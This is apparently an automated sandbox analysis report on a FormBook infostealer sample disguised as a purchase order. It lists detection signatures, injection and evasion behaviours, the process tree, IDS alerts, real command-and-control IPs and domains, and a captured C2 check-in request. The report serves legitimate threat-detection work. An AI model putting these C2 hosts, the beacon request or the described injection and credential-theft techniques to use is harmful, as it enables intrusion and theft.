Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO AT-5228.exe

Overview

General Information

Sample name:PO AT-5228.exe
Analysis ID:1554972
MD5:3df965173d78acbf95001caccbeaa150
SHA1:0ebe604c158eca5244c2fb19d56b03f6f7ae338a
SHA256:865ba0cdbc273e3d3035ec2acaf6510977798e008e79546e96e33e289b22c3b2
Tags:exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO AT-5228.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\PO AT-5228.exe" MD5: 3DF965173D78ACBF95001CACCBEAA150)
    • svchost.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\PO AT-5228.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • BLUymyzgBTyhbo.exe (PID: 5856 cmdline: "C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • AtBroker.exe (PID: 7352 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: D5B61959A509BDA85300781F5A829610)
          • BLUymyzgBTyhbo.exe (PID: 2800 cmdline: "C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7744 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.3527019353.0000000005710000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1781295730.0000000002CD0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.3524540674.0000000000790000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.3525547305.0000000004210000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.1781112261.0000000000440000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.440000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.440000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO AT-5228.exe", CommandLine: "C:\Users\user\Desktop\PO AT-5228.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO AT-5228.exe", ParentImage: C:\Users\user\Desktop\PO AT-5228.exe, ParentProcessId: 7276, ParentProcessName: PO AT-5228.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO AT-5228.exe", ProcessId: 7300, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO AT-5228.exe", CommandLine: "C:\Users\user\Desktop\PO AT-5228.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO AT-5228.exe", ParentImage: C:\Users\user\Desktop\PO AT-5228.exe, ParentProcessId: 7276, ParentProcessName: PO AT-5228.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO AT-5228.exe", ProcessId: 7300, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-13T09:26:31.986660+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449730TCP
                2024-11-13T09:26:51.947915+010020229301A Network Trojan was detected52.149.20.212443192.168.2.458815TCP
                2024-11-13T09:26:53.351914+010020229301A Network Trojan was detected52.149.20.212443192.168.2.458816TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-13T09:26:44.569269+010028554651A Network Trojan was detected192.168.2.44973638.88.82.5680TCP
                2024-11-13T09:27:07.951083+010028554651A Network Trojan was detected192.168.2.4588203.33.130.19080TCP
                2024-11-13T09:27:21.875358+010028554651A Network Trojan was detected192.168.2.458870194.58.112.17480TCP
                2024-11-13T09:27:35.341841+010028554651A Network Trojan was detected192.168.2.4589483.33.130.19080TCP
                2024-11-13T09:27:50.170836+010028554651A Network Trojan was detected192.168.2.459023104.21.14.18380TCP
                2024-11-13T09:28:03.667072+010028554651A Network Trojan was detected192.168.2.45910167.223.117.14280TCP
                2024-11-13T09:28:17.827029+010028554651A Network Trojan was detected192.168.2.4591053.33.130.19080TCP
                2024-11-13T09:28:31.644067+010028554651A Network Trojan was detected192.168.2.459109113.20.119.3180TCP
                2024-11-13T09:28:45.910009+010028554651A Network Trojan was detected192.168.2.45911347.129.103.18580TCP
                2024-11-13T09:28:59.452166+010028554651A Network Trojan was detected192.168.2.45911738.47.237.2780TCP
                2024-11-13T09:29:13.863112+010028554651A Network Trojan was detected192.168.2.459121206.119.81.3680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-13T09:27:00.343483+010028554641A Network Trojan was detected192.168.2.4588173.33.130.19080TCP
                2024-11-13T09:27:03.753028+010028554641A Network Trojan was detected192.168.2.4588183.33.130.19080TCP
                2024-11-13T09:27:05.405537+010028554641A Network Trojan was detected192.168.2.4588193.33.130.19080TCP
                2024-11-13T09:27:14.244016+010028554641A Network Trojan was detected192.168.2.458822194.58.112.17480TCP
                2024-11-13T09:27:16.921423+010028554641A Network Trojan was detected192.168.2.458838194.58.112.17480TCP
                2024-11-13T09:27:19.306881+010028554641A Network Trojan was detected192.168.2.458854194.58.112.17480TCP
                2024-11-13T09:27:27.678498+010028554641A Network Trojan was detected192.168.2.4589023.33.130.19080TCP
                2024-11-13T09:27:30.221107+010028554641A Network Trojan was detected192.168.2.4589173.33.130.19080TCP
                2024-11-13T09:27:32.803146+010028554641A Network Trojan was detected192.168.2.4589323.33.130.19080TCP
                2024-11-13T09:27:42.064513+010028554641A Network Trojan was detected192.168.2.458983104.21.14.18380TCP
                2024-11-13T09:27:44.597204+010028554641A Network Trojan was detected192.168.2.458999104.21.14.18380TCP
                2024-11-13T09:27:47.160557+010028554641A Network Trojan was detected192.168.2.459009104.21.14.18380TCP
                2024-11-13T09:27:56.034508+010028554641A Network Trojan was detected192.168.2.45905867.223.117.14280TCP
                2024-11-13T09:27:58.597030+010028554641A Network Trojan was detected192.168.2.45906967.223.117.14280TCP
                2024-11-13T09:28:01.387326+010028554641A Network Trojan was detected192.168.2.45908567.223.117.14280TCP
                2024-11-13T09:28:09.323526+010028554641A Network Trojan was detected192.168.2.4591023.33.130.19080TCP
                2024-11-13T09:28:11.872164+010028554641A Network Trojan was detected192.168.2.4591033.33.130.19080TCP
                2024-11-13T09:28:15.300346+010028554641A Network Trojan was detected192.168.2.4591043.33.130.19080TCP
                2024-11-13T09:28:24.003472+010028554641A Network Trojan was detected192.168.2.459106113.20.119.3180TCP
                2024-11-13T09:28:26.550389+010028554641A Network Trojan was detected192.168.2.459107113.20.119.3180TCP
                2024-11-13T09:28:29.144201+010028554641A Network Trojan was detected192.168.2.459108113.20.119.3180TCP
                2024-11-13T09:28:38.300689+010028554641A Network Trojan was detected192.168.2.45911047.129.103.18580TCP
                2024-11-13T09:28:40.832105+010028554641A Network Trojan was detected192.168.2.45911147.129.103.18580TCP
                2024-11-13T09:28:43.409754+010028554641A Network Trojan was detected192.168.2.45911247.129.103.18580TCP
                2024-11-13T09:28:51.797362+010028554641A Network Trojan was detected192.168.2.45911438.47.237.2780TCP
                2024-11-13T09:28:54.330228+010028554641A Network Trojan was detected192.168.2.45911538.47.237.2780TCP
                2024-11-13T09:28:56.906066+010028554641A Network Trojan was detected192.168.2.45911638.47.237.2780TCP
                2024-11-13T09:29:06.175663+010028554641A Network Trojan was detected192.168.2.459118206.119.81.3680TCP
                2024-11-13T09:29:08.769360+010028554641A Network Trojan was detected192.168.2.459119206.119.81.3680TCP
                2024-11-13T09:29:11.316348+010028554641A Network Trojan was detected192.168.2.459120206.119.81.3680TCP
                2024-11-13T09:29:19.904719+010028554641A Network Trojan was detected192.168.2.459122172.217.16.21180TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: PO AT-5228.exeAvira: detected
                Source: PO AT-5228.exeReversingLabs: Detection: 34%
                Source: PO AT-5228.exeVirustotal: Detection: 27%Perma Link
                Source: Yara matchFile source: 1.2.svchost.exe.440000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.440000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3527019353.0000000005710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1781295730.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3524540674.0000000000790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3525547305.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1781112261.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1781559228.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3525581336.0000000005270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3524288505.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: PO AT-5228.exeJoe Sandbox ML: detected
                Source: PO AT-5228.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BLUymyzgBTyhbo.exe, 00000002.00000002.3524476416.0000000000A8E000.00000002.00000001.01000000.00000004.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3524287384.0000000000A8E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: ATBroker.pdb source: svchost.exe, 00000001.00000003.1750282155.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750196591.000000000281B000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3524911092.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO AT-5228.exe, 00000000.00000003.1685890641.0000000004370000.00000004.00001000.00020000.00000000.sdmp, PO AT-5228.exe, 00000000.00000003.1686242447.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1689123695.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1692725433.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1789035280.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.000000000471E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.0000000004580000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1787592715.0000000004216000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO AT-5228.exe, 00000000.00000003.1685890641.0000000004370000.00000004.00001000.00020000.00000000.sdmp, PO AT-5228.exe, 00000000.00000003.1686242447.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1689123695.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1692725433.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 00000003.00000003.1789035280.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.000000000471E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.0000000004580000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1787592715.0000000004216000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: AtBroker.exe, 00000003.00000002.3526286582.0000000004BAC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3524603774.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000000.1850115627.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2119258740.000000000D29C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000001.00000003.1750282155.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750196591.000000000281B000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3524911092.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: AtBroker.exe, 00000003.00000002.3526286582.0000000004BAC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3524603774.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000000.1850115627.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2119258740.000000000D29C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BA6CA9
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00BA60DD
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00BA63F9
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BAEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BAEB60
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BAF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BAF5FA
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BAF56F FindFirstFileW,FindClose,0_2_00BAF56F
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BB1B2F
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BB1C8A
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BB1F94
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004FC830 FindFirstFileW,FindNextFileW,FindClose,3_2_004FC830
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then xor eax, eax3_2_004E9EE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then mov ebx, 00000004h3_2_043104DF

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58817 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58820 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58818 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58819 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58838 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58854 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58870 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58917 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58902 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58999 -> 104.21.14.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58822 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58983 -> 104.21.14.183:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59023 -> 104.21.14.183:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58948 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58932 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59009 -> 104.21.14.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59102 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59069 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59107 -> 113.20.119.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59108 -> 113.20.119.31:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59109 -> 113.20.119.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59112 -> 47.129.103.185:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59104 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59103 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59115 -> 38.47.237.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59110 -> 47.129.103.185:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59101 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59058 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59118 -> 206.119.81.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59106 -> 113.20.119.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59119 -> 206.119.81.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59122 -> 172.217.16.211:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59113 -> 47.129.103.185:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59105 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59117 -> 38.47.237.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59085 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59116 -> 38.47.237.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59120 -> 206.119.81.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59111 -> 47.129.103.185:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59114 -> 38.47.237.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59121 -> 206.119.81.36:80
                Source: DNS query: www.kghjkx.xyz
                Source: DNS query: www.iuyi542.xyz
                Source: Joe Sandbox ViewIP Address: 67.223.117.142 67.223.117.142
                Source: Joe Sandbox ViewIP Address: 38.88.82.56 38.88.82.56
                Source: Joe Sandbox ViewIP Address: 206.119.81.36 206.119.81.36
                Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:58816
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:58815
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49730
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00BB4EB5
                Source: global trafficHTTP traffic detected: GET /fu91/?rP=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1Host: www.college-help.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
